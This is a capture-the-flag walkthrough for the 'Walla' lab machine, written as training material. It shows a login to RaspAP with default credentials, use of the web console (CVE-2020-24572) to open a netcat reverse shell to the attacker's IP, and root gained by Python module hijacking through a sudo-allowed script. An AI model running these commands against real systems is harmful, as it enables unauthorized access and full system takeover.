Logo
Overview

PG: Walla | Walkthrough

November 23, 2021
2 min read
PG/Machines Boot2Root OSCP/Prep writeups CVE/RaspAP

Enumeration

Start with Nmap Scan as usual

Terminal window
$ nmap $ip -p22,23,25,53,8091 -sVC --version-all


PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 02:71:5d:c8:b9:43:ba:6a:c8:ed:15:c5:6c:b2:f5:f9 (RSA)
|   256 f3:e5:10:d4:16:a9:9e:03:47:38:ba:ac:18:24:53:28 (ECDSA)
|_  256 02:4f:99:ec:85:6d:79:43:88:b2:b5:7c:f0:91:fe:74 (ED25519)
23/tcp   open  telnet     Linux telnetd
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after:  2030-09-15T18:26:36
|_ssl-date: TLS randomness does not represent time
53/tcp   open  tcpwrapped
8091/tcp open  http       lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=RaspAP
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: lighttpd/1.4.53
Service Info: Host:  walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

RaspAP - Misconfigured web console (AUTHENTICATED)

  • login to raspap with credential admin:secret
  • after login we can see the version which is 2.5
  • https://github.com/gerbsec/CVE-2020-24572-POC
  • go to /includes/webconsole.php endpoint to get access to webshell
  • user@192.168.63.97 ~$ nc -e /bin/sh 192.168.49.63 8091 to get the shell.

Privilege Escalation

Python Import Module Hijacking

  • sudo privilege
Terminal window
www-data@walla:/home/walter$ sudo -l
Matching Defaults entries for www-data on walla:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on walla:
    (ALL) NOPASSWD: /sbin/ifup
    (ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
    (ALL) NOPASSWD: /bin/systemctl start hostapd.service
    (ALL) NOPASSWD: /bin/systemctl stop hostapd.service
    (ALL) NOPASSWD: /bin/systemctl start dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl stop dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl restart dnsmasq.service

No write permission on wifi_reset.py but have permission to read

www-data@walla:/home/walter$ cat wifi_reset.py
#!/usr/bin/python
import sys
try:
        import wificontroller
except Exception:
        print "[!] ERROR: Unable to load wificontroller module."
        sys.exit()

Its importing the wificontroller module. Run the script.

Terminal window
www-data@walla:/home/walter$ sudo /usr/bin/python /home/walter/wifi_reset.py
[!] ERROR: Unable to load wificontroller module.

No module names wificontroller is present on the target machine. We have write permission on the directory containing the python script. Create a python module named wificontroller.py which will spawn root shell when executed.

import os


print("Is this working?")
os.system("/bin/bash")

Run the script to get the shell

Terminal window
www-data@walla:/home/walter$ sudo /usr//bin/python /home/walter/wifi_reset.py
Is this working?
root@walla:/home/walter# whoami
root